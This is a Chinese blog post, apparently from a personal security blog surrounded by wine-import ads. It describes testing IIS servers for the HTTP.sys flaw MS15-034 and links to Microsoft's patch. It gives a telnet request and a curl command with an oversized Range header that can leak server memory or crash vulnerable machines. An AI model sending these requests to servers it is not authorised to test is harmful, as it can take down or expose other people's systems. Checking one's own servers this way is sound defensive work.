• 喜欢和红酒的朋友注意了!!!
  • 喜欢和红酒的朋友注意了!!!
  • 喜欢和红酒的朋友注意了!!!
  • 广州市酒管家贸易有限公司是一家领先的进口葡萄酒跨境贸易公司, 为进口商提供金融、 选酒、 海运、 报关、 仓库全方位一体的供应链服务。 公司股东往返国外多 年, 为市场葡萄酒收藏家和葡萄酒爱好者从事采购、 推荐酒庄的服务。 公司熟悉市场运作,有着独特的市场运营理念, 为客户提供量身定制的营销方案、 产品定位路线并且利用专业 大数据分析采购合理性。 采购方面直采直供, 没有中间商直达酒庄源头, 帮助客户减少中间酒商, 最大化降低采购成本, 实现客户利润最大化

HTTP.SYS远程代码执行漏洞测试

博客 James 4个月前 (04-12) 161次浏览 已收录 0个评论 扫描二维码

简介:

在2015年4月安全补丁日,微软发布的众多安全更新中,修复了HTTP.sys中一处允许远程执行代码漏洞,编号为:CVE-2015-1635(MS15-034 )。利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。根据公告显示,该漏洞对服务器系统造成了不小的影响,主要影响了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在内的主流服务器操作系统。

测试:

方法1:

# telnet www.test.com 80
GET / HTTP/1.1
Host: stuff
Range: bytes=0-18446744073709551615

方法2:

# curl -v www.test.com -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"

判断是否存在漏洞:

不存在该漏洞的响应包为:

HTTP Error 400. The request has an invalid header name.

存在漏洞的响应包为:

< HTTP/1.1 416 Requested Range Not Satisfiable
< Content-Type: text/html
< Last-Modified: Thu, 22 Aug 2013 23:53:12 GMT
< Accept-Ranges: bytes
< ETag: "2edebc2929fce1:0"

如何修复该问题:https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2015/ms15-034 ,找到对应的系统版本链接,下载安装即可修复此问题。

 


老余博客, 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:HTTP.SYS远程代码执行漏洞测试

广州市酒管家贸易有限公司(www.jiuguanjiamaoyi.com)是一家葡萄酒进口以及葡萄酒批发零售与一体的公司。我们致力于在全国范围内用最好的价格提供最优质的葡萄酒。酒管家的使命是用高品质的葡萄酒和完善的服务来传播给大家快乐与享受。我们随时欢迎您的到来,让您体验国内最专业的葡萄酒文化! 购买联系:13672661181(微信同号)
喜欢 (3)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址